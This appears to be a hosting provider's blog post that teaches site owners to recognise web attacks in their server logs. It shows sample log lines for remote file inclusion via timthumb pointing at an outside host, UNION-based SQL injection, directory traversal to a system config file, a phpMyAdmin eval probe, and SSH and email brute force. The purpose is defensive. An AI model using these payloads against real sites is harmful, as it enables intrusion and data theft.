That’s right, everyone is a potential target — not just the big names, not just the rich companies, etc.
Now, web-based hack attempts come in many forms ranging from brute force to SQL injections.
Here’s a list of the common types including links to their definitions:
- Brute Force Attack
- Cross Site Scripting Attack
- Directory Traversal Attack
- Local file inclusion
- Remote file inclusion
- SQL Injection attack
I would like to share with you what each of the above types looks like from a log file or security report perspective.
I’m going to start off with the most common type we see which is remote file inclusion:
22.214.171.124 - - [06/Sep/2012:01:13:27 -0400] "GET /packages//wp-content/themes/metamorphosis/functions/thumb.php?src=http://www.blogger.com.moulinsaeau-41.org/cache.php HTTP/1.1" 404 3612 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2)
The above is timthumb attack where the attacker believes the Metamorphosis theme for WordPress if vulnerable; and they are trying to include the code from http://www.blogger.com.moulinsaeau-41.org/cache.php through the potential vulnerability.
The next type is an SQL injection attack:
126.96.36.199 - - [09/Sep/2012:01:16:03 +0100] "GET /merchandise.php?id=-999.9%20UNION%20ALL%20SELECT%20(SELECT%20distinct%20concat(0x7e,0x27,Hex(cast(table_name%20as%20char)),0x27,0x7e)%20FROM%20information_schema.tables%20Where%20table_schema=0x6A6F686E73746F6E5F6965%20limit%200,1),2,3,4,5-- HTTP/1.1" 500 3506 "-" "-" UEvfw1Qz7pgAAGfUdE0 "-"
The next is a directory traversal attack:
188.8.131.52 - - [05/Sep/2012:21:28:20 +0100] "GET /vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../..//etc/amportal.conf%00 HTTP/1.1" 500 3506 "-" "-" UEe15FQz7pAAABD2KuM "-"
What follows is an example of a local file inclusion:
184.108.40.206 - - [05/Sep/2012:18:13:46 +0100] "GET /phpMyAdmin//config/config.inc.php?eval=echo%20md5(123); HTTP/1.1" 500 3506 "-" "-" UEeISlWFNc8AABl2Nvw "-"
Below are two examples of brute force — one for SSH, the other for email:
sshd: Invalid user deploy from 220.127.116.11 vpopmail: vchkpw-pop3: vpopmail user not found webmaster@:18.104.22.168
Do you review your hosting log files on a regular basis to see what attacks are getting through or being blocked?
Is your provider doing this for you?
Please let us know your questions and thoughts in the comments below.